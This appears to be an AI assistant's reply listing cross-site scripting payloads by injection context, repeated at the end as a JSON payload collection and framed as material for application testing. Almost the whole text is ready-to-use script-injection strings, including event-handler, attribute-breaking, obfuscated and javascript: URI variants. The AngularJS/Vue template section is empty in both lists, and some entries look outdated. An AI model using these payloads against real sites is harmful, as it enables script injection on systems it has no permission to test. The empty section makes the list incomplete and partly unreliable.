Here’s a comprehensive list of all major types of XSS payloads, categorized by context and attack method. These are useful for testing applications for XSS vulnerabilities in different areas:
- Basic Payloads
<script>alert(1)</script>
<svg onload=alert(1)>
<img src=x onerror=alert(1)>
<iframe src="javascript:alert(1)"></iframe>
<body onload=alert(1)>
<video><source onerror="alert(1)">
- Attribute Injection
"><img src=x onerror=alert(1)>
"><input onfocus=alert(1) autofocus>
"><div onmouseover=alert(1)>hover me</div>
"><a href="javascript:alert(1)">click</a>
- DOM-based XSS
// URL: http://example.com/#<script>alert(1)</script>
document.location.hash
document.URL
document.write(untrusted_input)
location.href
Payload example for DOM sink:
<script>document.write(location.hash)</script>
- Event Handler Payloads
<svg onload=alert(1)>
<marquee onstart=alert(1)>
<math href="javascript:alert(1)">
<button onclick=alert(1)>Click</button>
<details open ontoggle=alert(1)>
- Obfuscated Payloads
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<IMG SRC=JaVaScRiPt:alert(1)>
<svg oNLoAd=alert(1)>
- Inline JavaScript Context
" onerror="alert(1)
' onerror='alert(1)
"><script>alert(1)</script>
- JavaScript URI Payloads
<a href="javascript:alert(1)">Click</a>
<iframe src="javascript:alert(1)"></iframe>
- JSON/JavaScript Injection
{"name":"<script>alert(1)</script>"}
var data = "<img src=x onerror=alert(1)>";
- CSS Injection (in rare cases)
<style>@import 'javascript:alert(1)';</style>
<div style="background:url(javascript:alert(1))">
- AngularJS/VueJS Context (Template Injection)
- Inline SVG Injection
<svg><script>alert(1)</script></svg>
<svg><a xlink:href="javascript:alert(1)">CLICK</a></svg>
- HTML5 Form Elements
<keygen autofocus onfocus=alert(1)>
<meter value=100 min=0 max=200 onmouseover=alert(1)>
<progress value=100 max=200 onmouseover=alert(1)>
Would you like a downloadable list or JSON/CSV format for automation or tool integration?
{
"basic_payloads": [
"<script>alert(1)</script>",
"<svg onload=alert(1)>",
"<img src=x onerror=alert(1)>",
"<iframe src=\"javascript:alert(1)\"></iframe>",
"<body onload=alert(1)>",
"<video><source onerror=\"alert(1)\">"
],
"attribute_injection": [
"\"><img src=x onerror=alert(1)>",
"\"><input onfocus=alert(1) autofocus>",
"\"><div onmouseover=alert(1)>hover me</div>",
"\"><a href=\"javascript:alert(1)\">click</a>"
],
"dom_based_xss": [
"<script>document.write(location.hash)</script>",
"<script>document.write(document.URL)</script>"
],
"event_handler_payloads": [
"<svg onload=alert(1)>",
"<marquee onstart=alert(1)>",
"<math href=\"javascript:alert(1)\">",
"<button onclick=alert(1)>Click</button>",
"<details open ontoggle=alert(1)>"
],
"obfuscated_payloads": [
"<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>",
"<IMG SRC=JaVaScRiPt:alert(1)>",
"<svg oNLoAd=alert(1)>"
],
"inline_javascript": [
"\" onerror=\"alert(1)",
"' onerror='alert(1)",
"\"><script>alert(1)</script>"
],
"javascript_uri": [
"<a href=\"javascript:alert(1)\">Click</a>",
"<iframe src=\"javascript:alert(1)\"></iframe>"
],
"json_js_injection": [
"{\"name\":\"<script>alert(1)</script>\"}",
"var data = \"<img src=x onerror=alert(1)>\";"
],
"css_injection": [
"<style>@import 'javascript:alert(1)';</style>",
"<div style=\"background:url(javascript:alert(1))\">"
],
"angular_vue_template_injection": [
"",
""
],
"svg_injection": [
"<svg><script>alert(1)</script></svg>",
"<svg><a xlink:href=\"javascript:alert(1)\">CLICK</a></svg>"
],
"html5_elements": [
"<keygen autofocus onfocus=alert(1)>",
"<meter value=100 min=0 max=200 onmouseover=alert(1)>",
"<progress value=100 max=200 onmouseover=alert(1)>"
]
}